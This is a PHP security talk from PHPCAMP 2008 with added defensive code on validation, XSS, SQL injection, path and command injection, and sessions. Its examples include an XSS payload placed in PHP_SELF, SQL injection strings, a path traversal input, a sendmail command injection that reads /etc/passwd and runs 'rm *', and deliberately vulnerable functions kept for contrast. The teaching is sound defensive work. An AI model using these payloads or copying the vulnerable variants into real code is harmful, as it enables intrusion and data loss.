
PHP Security

Presented at PHPCAMP Pune, 2008



  1. PHP Security, by Uttam Kumar. Email: trickyuk001@gmail.com, Mobile: 8149253187
  2. What is security? Measurement, safety, protection.
  3. Secure web applications. Web security issues have to do with:
     – hacker attacks
       • denial of service
       • server hijacking
     – common threats
     – compromise of data
  4. PHP & security: a growing language, and so a major concern.
  5. Never trust the web: input data validation
     – register_globals = Off
     – $_REQUEST[] is a big no: read $_GET, $_POST and $_COOKIE explicitly so you know where a value came from
     – type-cast input data
       • is_numeric() is not a sufficient check for numeric data (it accepts more forms than you expect, such as exponents and leading whitespace, and number handling is locale-sensitive); cast to int/float instead
       • use a regular expression if the data is a string
     – path validation
       • always use basename()
  6. Never trust the web: content size validation
     – use server-side maximum length validation (a client-side maxlength attribute is not a control)
     – file upload
       • check the uploaded file size with $_FILES['name']['size']
       • the browser-supplied MIME type ($_FILES['name']['type']) is not reliable: it is set by the client
       • use getimagesize() to verify an image upload by its content
     – external-source uploads, e.g. an avatar
       • make a local copy if a path/URL of the file is submitted, rather than using the remote location directly
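The validation points of slides 5 and 6 in working form. This is an added example, not code from the original slides; the field names, the 3-32 character username rule, the size limits and the upload/avatar directories are assumptions chosen for illustration.

```php
<?php
// Added example (not from the original slides): request parameter and upload
// validation along the lines of slides 5 and 6. Field names, size limits and
// directories are assumptions for illustration.
declare(strict_types=1);

// Integer input: cast instead of trusting is_numeric(), which also accepts
// "1e3", " 42" and other forms the application rarely wants.
function readPositiveInt(array $src, string $key, int $max = PHP_INT_MAX): ?int
{
    if (!isset($src[$key]) || !is_string($src[$key])) {
        return null;
    }
    // ctype_digit rejects signs, whitespace, exponents and decimals.
    if (!ctype_digit($src[$key]) || strlen($src[$key]) > 18) {
        return null;
    }
    $n = (int) $src[$key];
    return ($n > 0 && $n <= $max) ? $n : null;
}

// String input: a regular expression that describes exactly what is allowed
// (here: a username), with the length limit enforced server-side.
function readUsername(array $src, string $key): ?string
{
    if (!isset($src[$key]) || !is_string($src[$key])) {
        return null;
    }
    return preg_match('/\A[a-z0-9_]{3,32}\z/', $src[$key]) === 1 ? $src[$key] : null;
}

// Image upload: ignore the browser-supplied MIME type entirely; check the size
// server-side and let getimagesize() decide whether the bytes are an image.
function validateImageUpload(array $file, int $maxBytes): array
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return ['ok' => false, 'reason' => 'upload error ' . ($file['error'] ?? 'unknown')];
    }
    if ($file['size'] > $maxBytes) {
        return ['ok' => false, 'reason' => 'too large'];
    }
    $info = @getimagesize($file['tmp_name']);   // false for anything that is not an image
    $allowed = [IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png', IMAGETYPE_GIF => 'gif'];
    if ($info === false || !isset($allowed[$info[2]])) {
        return ['ok' => false, 'reason' => 'not an accepted image'];
    }
    // The server chooses the stored name: random, with an extension derived
    // from the detected type, never from $file['name'] or $file['type'].
    $stored = bin2hex(random_bytes(16)) . '.' . $allowed[$info[2]];
    return ['ok' => true, 'name' => $stored, 'width' => $info[0], 'height' => $info[1]];
}

// Avatar given as a URL: fetch a bounded local copy instead of storing the URL
// or handing it to an image function directly. Only http(s) is accepted;
// production code should also resolve the host and reject private ranges.
function fetchRemoteAvatar(string $url, string $destDir, int $maxBytes): ?string
{
    $parts = parse_url($url);
    if ($parts === false || !in_array($parts['scheme'] ?? '', ['http', 'https'], true)) {
        return null;   // no file://, ftp://, php://, data:
    }
    $ctx = stream_context_create(['http' => ['timeout' => 5, 'follow_location' => 0]]);
    $data = @file_get_contents($url, false, $ctx, 0, $maxBytes + 1);
    if ($data === false || strlen($data) > $maxBytes) {
        return null;
    }
    $tmp = tempnam(sys_get_temp_dir(), 'av');
    file_put_contents($tmp, $data);
    $check = validateImageUpload(
        ['error' => UPLOAD_ERR_OK, 'size' => strlen($data), 'tmp_name' => $tmp],
        $maxBytes
    );
    if (!$check['ok']) {
        unlink($tmp);
        return null;
    }
    $dest = rtrim($destDir, '/') . '/' . $check['name'];
    rename($tmp, $dest);
    return $dest;
}

// Constructed request data for illustration (a real handler reads $_GET/$_POST/$_FILES):
var_dump(readPositiveInt(['id' => '42'], 'id'));
var_dump(readPositiveInt(['id' => '1e3'], 'id'));
var_dump(readUsername(['user' => 'al ice'], 'user'));
```

The upload check deliberately never looks at `$_FILES['name']['type']`; the stored file name is generated, so neither the original name nor the client's MIME claim reaches the filesystem.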
  7. XSS attack
     – can lead to embarrassment (defacement)
     – session take-over
     – password theft
     – user tracking by third parties
  8. XSS attack: prevention is better than cure
     – use strip_tags() (no tags allowed, please)
     – use htmlentities() on output
     – is $_SERVER safe? No; parts of it are derived from the request and can be set by the client:
       • request: php.php/%22%3E%3Cscript%3Ealert('xss')%3c/script%3E%3cfoo
       • $_SERVER['PATH_INFO'] = /"><script>alert('xss')</script><foo
       • $_SERVER['PHP_SELF'] = /php.php/"><script>alert('xss')</script><foo
     – IP-based information
       • HTTP_X_FORWARDED_FOR is a client-supplied header: take the last address of the chain and normalise it with ip2long()/long2ip(), so that only a well-formed address is ever used
         $aIp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
         $sValidIp = long2ip(ip2long(array_pop($aIp)));
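Slide 8's two `$_SERVER` points in code: the PHP_SELF form-action injection beside its fixed form, and a client-IP lookup that only believes X-Forwarded-For when the request arrived from a known proxy. This is an added example, not code from the original slides; the function names, the proxy address 10.0.0.5 and the constructed request array are assumptions for illustration.

```php
<?php
// Added example (not from the original slides): output encoding, PHP_SELF
// and X-Forwarded-For handling from slide 8. Names and addresses are
// assumptions for illustration.
declare(strict_types=1);

// Encode for an HTML text node or attribute value. ENT_QUOTES covers both
// quote characters. strip_tags() is not an output encoder and must not be
// relied on for this.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Vulnerable: PHP_SELF echoes the request path, which the client controls.
// Requesting /php.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E%3Cfoo
// gives PHP_SELF = /php.php/"><script>alert('xss')</script><foo
function formTagVulnerable(array $server): string
{
    return '<form action="' . $server['PHP_SELF'] . '" method="post">';
}

// Hardened: encode the value, and prefer SCRIPT_NAME, which comes from the
// script's own path rather than from the request URI.
function formTagSafe(array $server): string
{
    return '<form action="' . h($server['SCRIPT_NAME']) . '" method="post">';
}

// Client IP: X-Forwarded-For is an ordinary request header, so any client can
// send "X-Forwarded-For: 1.2.3.4". Believe it only when REMOTE_ADDR is one of
// our own proxies, validate every element, and otherwise use REMOTE_ADDR.
function clientIp(array $server, array $trustedProxies): string
{
    $remote = $server['REMOTE_ADDR'];
    if (!in_array($remote, $trustedProxies, true) || empty($server['HTTP_X_FORWARDED_FOR'])) {
        return $remote;
    }
    // Each proxy appends the address it saw, so the rightmost entry is the
    // most trustworthy. Walk from the right, skip our own proxies, and take
    // the first address that is not ours. filter_var() replaces the
    // long2ip(ip2long()) trick from the slide and also handles IPv6.
    $chain = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR']));
    for ($i = count($chain) - 1; $i >= 0; $i--) {
        $ip = $chain[$i];
        if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
            return $remote;   // garbage in the chain: fall back to the socket address
        }
        if (!in_array($ip, $trustedProxies, true)) {
            return $ip;
        }
    }
    return $remote;
}

// Constructed request data for illustration: the request came through our
// proxy 10.0.0.5, and the client put an XSS payload in the header as well.
$server = [
    'REMOTE_ADDR'          => '10.0.0.5',
    'HTTP_X_FORWARDED_FOR' => '"><script>alert(1)</script>, 203.0.113.9',
    'PHP_SELF'             => '/php.php/"><script>alert(\'xss\')</script><foo',
    'SCRIPT_NAME'          => '/php.php',
];
echo formTagVulnerable($server), "\n";
echo formTagSafe($server), "\n";
echo clientIp($server, ['10.0.0.5']), "\n";
```

With the constructed data `clientIp()` returns 203.0.113.9, the address our proxy actually saw; the forged leftmost entry is never reached. If the same request hits the script without passing through a trusted proxy, the header is ignored altogether.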
  9. SQL injection
     – arbitrary query execution
     – removal of data
     – modification of existing values
     – denial of service
     – arbitrary data injection
  10. Preventing SQL injection
     • Are magic quotes enough? No.
       – use mysql_real_escape_string() (the mysql_* extension has since been removed from PHP; mysqli and PDO are the replacements)
       – use prepared statements
       – never omit the single quotes around values, even numeric ones, or escaping protects nothing
       – the LIKE quandary: escaping does not neutralise the wildcards % and _, which need their own escaping (addcslashes($s, '%_'), not addslashes())
       – never print the failed query in an error message
     • Authentication data storage
       – encrypt sensitive data used to access the database
       – make sure it is only loaded for the VirtualHost that needs it
  11. Authentication data storage
     Apache server configuration:
       <VirtualHost illa.ws>
           Include /home/illa/sql.conf
       </VirtualHost>
     /home/illa/sql.conf:
       SetEnv DB_LOGIN "login"
       SetEnv DB_PASSWD "password"
       SetEnv DB_HOST "127.0.0.7"
     The PHP file reads them as $_SERVER['DB_LOGIN'], $_SERVER['DB_PASSWD'] and $_SERVER['DB_HOST'], so no credentials live in the code.
     A better approach is to set these through PHP's ini directives from the Apache configuration, so they do not even appear in $_SERVER: php_admin_value mysql.default.user "login" (and likewise mysql.default.password and mysql.default.host).
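The prevention list of slide 10 and the credential handling of slide 11, written against the mysqli extension that replaced the mysql_* functions the slides refer to. This is an added example, not code from the original slides; the `users` table, its `id` and `name` columns, the database name `app` and the function names are assumptions for illustration.

```php
<?php
// Added example (not from the original slides): slide 10's prevention points
// with mysqli (the mysql_* functions were removed in PHP 7, magic quotes in
// PHP 5.4). Table, columns and database name are assumptions for illustration.
declare(strict_types=1);

// Throw on SQL errors instead of printing them: an error message that echoes
// the failed query hands the attacker the schema.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// Vulnerable: string concatenation. name=' OR '1'='1 matches every row, and
// when the quotes are omitted for a "numeric" column, id=1 OR 1=1 works
// without a single quote character.
function findUserVulnerable(mysqli $db, string $name): ?array
{
    $sql = "SELECT id, name FROM users WHERE name = '" . $name . "'";
    $res = $db->query($sql);
    return $res->fetch_assoc() ?: null;
}

// Hardened: a prepared statement sends the query text and the value
// separately, so no quoting decision is left to the application.
function findUser(mysqli $db, string $name): ?array
{
    $stmt = $db->prepare('SELECT id, name FROM users WHERE name = ?');
    $stmt->bind_param('s', $name);
    $stmt->execute();
    return $stmt->get_result()->fetch_assoc() ?: null;
}

// Numeric values: bind them as integers rather than interpolating them unquoted.
function findById(mysqli $db, int $id): ?array
{
    $stmt = $db->prepare('SELECT id, name FROM users WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    return $stmt->get_result()->fetch_assoc() ?: null;
}

// LIKE: binding stops injection but does not neutralise % and _, which are
// meaningful inside the pattern. Escape them, and the escape character
// itself, with addcslashes(); addslashes() does not touch them.
function escapeLike(string $s): string
{
    return addcslashes($s, '\\%_');
}

function searchUsers(mysqli $db, string $prefix): array
{
    // MySQL's default LIKE escape character is the backslash; add an explicit
    // ESCAPE clause if the server runs with NO_BACKSLASH_ESCAPES.
    $pattern = escapeLike($prefix) . '%';
    $stmt = $db->prepare('SELECT id, name FROM users WHERE name LIKE ?');
    $stmt->bind_param('s', $pattern);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// Credentials come from the environment that the Apache VirtualHost set
// (slide 11), never from a string in the script:
//   $db = new mysqli($_SERVER['DB_HOST'], $_SERVER['DB_LOGIN'], $_SERVER['DB_PASSWD'], 'app');
// or, with mysqli.default_host / mysqli.default_user / mysqli.default_pw set
// through php_admin_value, simply:
//   $db = new mysqli();
```

`escapeLike('50%_off')` yields `50\%\_off`, so the user's text is matched literally and only the trailing `%` the code appends acts as a wildcard.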
  12. Preventing code injection
     – path validation: validate the file name
         $sFile = "D'sozaRes.doc";
         basename($sFile); // returns D'sozaRes.doc on *nix
         basename($sFile); // returns 'sozaRes.doc on Win32
       basename() is platform dependent in which characters it treats as separators, so do not rely on it alone:
       • remove slashes
       • keep a whitelist of file names
       • use the full path
     – avoid variables in eval()
     – avoid using user-supplied values in regular expressions
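Slide 12's three rules (validate the name, whitelist, use the full path) plus the eval() and regex points, as working code. This is an added example, not code from the original slides; the base directory, the report whitelist and the arithmetic operations are assumptions for illustration.

```php
<?php
// Added example (not from the original slides): path validation, whitelisting
// and the eval()/regex points of slide 12. Directories, the report list and
// the operation names are assumptions for illustration.
declare(strict_types=1);

// Resolve a user-supplied file name inside a fixed base directory and refuse
// anything that escapes it. basename() alone is platform dependent (it treats
// "\" as a separator only on Windows), so the name is first reduced to a
// strict character whitelist and the resolved path is checked again after
// realpath(), which also follows symlinks.
function resolveDocument(string $baseDir, string $userName): ?string
{
    if (preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]{0,63}\z/', $userName) !== 1) {
        return null;   // no slashes, backslashes, leading dot or NUL
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $userName);
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;   // missing, or a link that points outside the directory
    }
    return $path;
}

// When the set of files is known, whitelist: the user picks a key, never a name.
function resolveReport(string $key): ?string
{
    static $reports = [
        'daily'   => '/var/reports/daily.csv',
        'monthly' => '/var/reports/monthly.csv',
    ];
    return $reports[$key] ?? null;
}

// Instead of eval('$result = ' . $userExpr . ';') to let users choose an
// operation, map the input to a fixed set of callables.
function applyOperation(string $op, int $a, int $b): ?int
{
    $ops = [
        'add' => fn(int $x, int $y): int => $x + $y,
        'sub' => fn(int $x, int $y): int => $x - $y,
        'mul' => fn(int $x, int $y): int => $x * $y,
    ];
    return isset($ops[$op]) ? $ops[$op]($a, $b) : null;
}

// User text inside a regular expression: quote it, so the user supplies a
// literal search string rather than a pattern (no delimiter escape, no
// catastrophic backtracking from a crafted pattern).
function containsTerm(string $haystack, string $userTerm): bool
{
    return preg_match('/' . preg_quote($userTerm, '/') . '/i', $haystack) === 1;
}

// Constructed inputs for illustration:
$docs = sys_get_temp_dir();
var_dump(resolveDocument($docs, '../../etc/passwd'));
var_dump(resolveDocument($docs, "D'sozaRes.doc"));
var_dump(resolveReport('daily'));
var_dump(applyOperation('add', 2, 3));
var_dump(containsTerm('report (final).doc', '(final)'));
```

The traversal attempt and the quoted name are both rejected at the whitelist step, before the filesystem is consulted; the `realpath()` prefix check is the second line of defence for names that pass the regex but resolve elsewhere through a symlink.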
  13. Command injection
     – use escapeshellcmd() and escapeshellarg()
     – use the full path to the command
     – set a CPU time limit and a memory limit for the command
       • shell_exec("ulimit -t 20 -m 20000; /usr/bin/php test.php");
  14. Calling external programs
       <?php
       $fp = popen('/usr/sbin/sendmail -i ' . $to, 'w');
       ?>
     The user could control $to to yield:
       http://examp.com/send.php?to=evil%40evil.org+%3C+%2Fetc%2Fpasswd%3B+rm+%2A
     which would result in running the command:
       /usr/sbin/sendmail -i evil@evil.org < /etc/passwd; rm *
     A solution would be:
       $fp = popen('/usr/sbin/sendmail -i ' . escapeshellarg($to), 'w');
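The difference between escapeshellcmd() and escapeshellarg() from slide 13, the sendmail case of slide 14, and a way to apply the ulimit idea without passing any user value through a shell. This is an added example, not code from the original slides; the helper script path, the recipient rule and the `-v` memory limit (the slide's `-m` is ignored by several shells on Linux) are assumptions for illustration.

```php
<?php
// Added example (not from the original slides): shell escaping and resource
// limits from slides 13 and 14. Paths and limits are assumptions for
// illustration. proc_open() with an array command needs PHP 7.4 or later.
declare(strict_types=1);

// escapeshellcmd() escapes shell metacharacters in a whole command line;
// escapeshellarg() wraps one argument in single quotes. They solve different
// problems: when the attacker controls one argument you need escapeshellarg(),
// because escapeshellcmd() leaves spaces alone and the value can still be
// split into extra options (e.g. "evil@evil.org -X /tmp/log" for sendmail).
function buildSendmailCommand(string $to): string
{
    return '/usr/sbin/sendmail -i ' . escapeshellarg($to);
}

// Better than escaping: validate the value against what it is supposed to be
// before it goes anywhere near a shell, and refuse option-looking values.
function validateRecipient(string $to): ?string
{
    if ($to === '' || $to[0] === '-' || filter_var($to, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    return $to;
}

// Run a PHP script under a CPU and memory limit. The command is an array, so
// no shell parses a string we built; the script path travels as a positional
// argument ($0 of the inner sh) and is never interpolated into the command.
function runPhpScriptWithLimits(string $script, int $cpuSeconds, int $memKb): array
{
    $cmd = [
        '/bin/sh', '-c',
        // ulimit applies to this sh and everything it execs; exec replaces the
        // shell with php so nothing else lingers.
        'ulimit -t ' . $cpuSeconds . ' -v ' . $memKb . ' && exec /usr/bin/php "$0"',
        $script,
    ];
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open($cmd, $spec, $pipes);
    if (!is_resource($proc)) {
        return ['status' => -1, 'stdout' => '', 'stderr' => 'proc_open failed'];
    }
    $out = stream_get_contents($pipes[1]);
    $err = stream_get_contents($pipes[2]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    return ['status' => proc_close($proc), 'stdout' => $out, 'stderr' => $err];
}

// The payload from slide 14 (constructed, already URL-decoded), shown as the
// command line it now produces and as a rejected recipient:
$evil = 'evil@evil.org < /etc/passwd; rm *';
echo buildSendmailCommand($evil), "\n";
var_dump(validateRecipient($evil));
var_dump(validateRecipient('user@example.org'));
```

With the payload, `buildSendmailCommand()` yields `/usr/sbin/sendmail -i 'evil@evil.org < /etc/passwd; rm *'`: one quoted argument, no redirection and no second command. `validateRecipient()` refuses it outright, which is the check that should run first.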
  15. Securing sessions
     • Weaknesses of sessions
       – server-side weakness: ls -l /tmp/sess_* can reveal session information to any local user on a shared host (the file names are the session IDs)
       – URL session exploitation (session ID carried in the URL)
     • Solutions
       – native protection (PHP's own session settings)
       – mix security and convenience
       – secure the session storage path (session.save_path outside the shared /tmp)
       – check the browser signature
       – referrer validation
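The session measures of slide 15 as a start-up routine: private storage path, cookie-only IDs, cookie flags, a browser-signature check, ID regeneration on login, and referrer validation with the caveat it needs. This is an added example, not code from the original slides; the save path, the function names and the per-session CSRF token that accompanies the referrer check are assumptions for illustration. Call it before any output is sent.

```php
<?php
// Added example (not from the original slides): session hardening along the
// lines of slide 15. The save path and helper names are assumptions for
// illustration. session_set_cookie_params() with an array needs PHP 7.3+.
declare(strict_types=1);

function startHardenedSession(string $savePath): void
{
    // Private, non-shared storage: a world-readable /tmp lets any local user
    // run `ls -l /tmp/sess_*` and learn other applications' session IDs.
    if (!is_dir($savePath)) {
        mkdir($savePath, 0700, true);
    }
    ini_set('session.save_path', $savePath);

    // No session IDs in URLs: they leak through Referer headers, logs and
    // bookmarks, and are the vector for fixation through crafted links.
    ini_set('session.use_only_cookies', '1');
    ini_set('session.use_trans_sid', '0');
    ini_set('session.use_strict_mode', '1');   // reject IDs the server did not issue

    // Cookie flags: not readable by script, not sent over plain HTTP,
    // not sent on cross-site requests.
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
    session_start();

    // Browser signature: a weak binding, since the User-Agent is chosen by the
    // client, but it stops a stolen ID being replayed unchanged from a
    // different browser.
    $sig = hash('sha256', $_SERVER['HTTP_USER_AGENT'] ?? '');
    if (isset($_SESSION['ua_sig']) && !hash_equals($_SESSION['ua_sig'], $sig)) {
        session_unset();
        session_destroy();
        session_start();
    }
    $_SESSION['ua_sig'] = $sig;
}

// Call at every privilege change (login, role switch) so an ID that was
// known before authentication is worthless afterwards.
function elevateSession(int $userId): void
{
    session_regenerate_id(true);   // true: remove the old session file
    $_SESSION['user_id']  = $userId;
    $_SESSION['login_at'] = time();
}

// Referrer validation for state-changing requests. A same-origin check on
// the Referer header is only a partial defence (the header may be absent or
// stripped by privacy settings), so pair it with a per-session token.
function checkSameOriginReferer(array $server, string $expectedHost): bool
{
    $host = parse_url($server['HTTP_REFERER'] ?? '', PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $expectedHost) === 0;
}

function csrfToken(): string
{
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf'];
}

function checkCsrfToken(?string $submitted): bool
{
    return is_string($submitted) && isset($_SESSION['csrf'])
        && hash_equals($_SESSION['csrf'], $submitted);
}

// Typical use in a request handler (path is an assumption):
//   startHardenedSession('/var/lib/app-sessions');
//   if ($_SERVER['REQUEST_METHOD'] === 'POST'
//       && (!checkSameOriginReferer($_SERVER, 'illa.ws')
//           || !checkCsrfToken($_POST['csrf'] ?? null))) {
//       http_response_code(403);
//       exit;
//   }
```

`session.use_strict_mode` is what makes the cookie-only setting effective against fixation: without it PHP happily creates a session under whatever ID the client presents.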
  16. Questions?
  17. Thank you!
